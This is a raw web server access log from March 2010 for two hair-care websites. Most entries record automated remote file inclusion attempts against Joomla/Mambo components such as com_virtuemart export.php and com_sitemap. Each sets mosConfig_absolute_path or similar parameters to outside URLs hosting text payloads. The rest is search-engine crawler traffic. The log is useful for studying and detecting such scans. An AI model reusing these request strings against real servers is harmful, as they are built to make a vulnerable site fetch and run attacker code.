200.93.147.154 - - [15/Mar/2010:08:59:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:59:07 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:59:07 -0700] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:59:14 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:59:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:59:15 -0700] "GET /logs/access_091214.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:08:59:18 -0700] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:00:07 -0700] "GET /logs/access_091214.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:00:07 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:00:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:00:07 -0700] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.0.102.12 - - [15/Mar/2010:09:00:49 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.0.102.12 - - [15/Mar/2010:09:00:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.0.102.12 - - [15/Mar/2010:09:00:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:01:10 -0700] "GET /logs/access_100125.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:01:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:01:10 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [15/Mar/2010:09:01:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:01:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
95.110.196.60 - - [15/Mar/2010:09:01:34 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.110.196.60 - - [15/Mar/2010:09:01:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.110.196.60 - - [15/Mar/2010:09:01:34 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:01:39 -0700] "GET /logs/access_100125.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:01:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:01:39 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [15/Mar/2010:09:02:27 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:05:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:05:28 -0700] "GET /logs/access_091214.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:05:28 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:05:29 -0700] "GET /logs/access_091012.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.65.202 - - [15/Mar/2010:09:05:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
124.217.242.70 - - [15/Mar/2010:09:06:06 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.myphotolife.co.kr//bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.242.70 - - [15/Mar/2010:09:06:06 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.myphotolife.co.kr//bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.217.242.70 - - [15/Mar/2010:09:06:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.myphotolife.co.kr//bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.107.104.81 - - [15/Mar/2010:09:06:52 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "growlonghairfast.com"
89.107.104.81 - - [15/Mar/2010:09:06:52 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "growlonghairfast.com"
211.47.237.17 - - [15/Mar/2010:09:08:32 -0700] "GET /logs/access.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [15/Mar/2010:09:08:32 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [15/Mar/2010:09:08:32 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://antigua.granada.notariado.org//includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.241.177.123 - - [15/Mar/2010:09:09:21 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.177.123 - - [15/Mar/2010:09:09:21 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:09:21 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:09:21 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:09:21 -0700] "GET /logs/access_100125.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.177.123 - - [15/Mar/2010:09:09:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.0.61.109 - - [15/Mar/2010:09:11:31 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "www.freehairsecrets.com"
221.0.61.109 - - [15/Mar/2010:09:11:32 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]" "www.freehairsecrets.com"
118.129.166.213 - - [15/Mar/2010:09:11:32 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://222.231.1.41/~sjabca/dbclqn/bbs/data/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:11:35 -0700] "GET /logs/access_091012.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:11:35 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:11:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.101.214.54 - - [15/Mar/2010:09:11:36 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [15/Mar/2010:09:11:36 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [15/Mar/2010:09:11:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.3 - - [15/Mar/2010:09:11:42 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:11:42 -0700] "GET /logs/access_091012.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:11:42 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:12:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:12:08 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:12:11 -0700] "GET /logs/access_091012.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:12:47 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:12:47 -0700] "GET /logs/access_091012.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.3 - - [15/Mar/2010:09:12:47 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kambiing.fileave.com/kambing1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:13:17 -0700] "GET /logs/access_100125.log////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:13:17 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:13:17 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:13:36 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:13:36 -0700] "GET /logs/access_100125.log////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:13:36 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:14:58 -0700] "GET /logs/access_100125.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:14:59 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:14:59 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
209.181.150.162 - - [15/Mar/2010:09:15:33 -0700] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.181.150.162 - - [15/Mar/2010:09:15:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.181.150.162 - - [15/Mar/2010:09:15:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://alice-t.dk/cache/intrusted.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:15:45 -0700] "GET /logs/access_100125.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:15:45 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
195.95.229.230 - - [15/Mar/2010:09:15:45 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://wijeens.t35.com/1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:17:53 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [15/Mar/2010:09:17:53 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [15/Mar/2010:09:17:53 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.25.9.136 - - [15/Mar/2010:09:20:59 -0700] "GET /freehairsecretsphp/index.php+%28200+ok%29+ACCEPTED HTTP/1.0" 404 - "http://growlonghairfast.com/freehairsecretsphp/index.php+%28200+ok%29+ACCEPTED" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
95.25.9.136 - - [15/Mar/2010:09:21:00 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
208.115.111.245 - - [15/Mar/2010:09:22:13 -0700] "GET /?M=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:18 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:21 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:26 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:31 -0700] "GET /tmp/?N=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:36 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:41 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:46 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:51 -0700] "GET /tmp/?D=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [15/Mar/2010:09:22:56 -0700] "GET /tmp/?M=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
89.107.104.81 - - [15/Mar/2010:09:24:05 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "freehairsecrets.com"
89.107.104.81 - - [15/Mar/2010:09:24:06 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "freehairsecrets.com"
212.241.177.123 - - [15/Mar/2010:09:24:14 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [15/Mar/2010:09:28:01 -0700] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
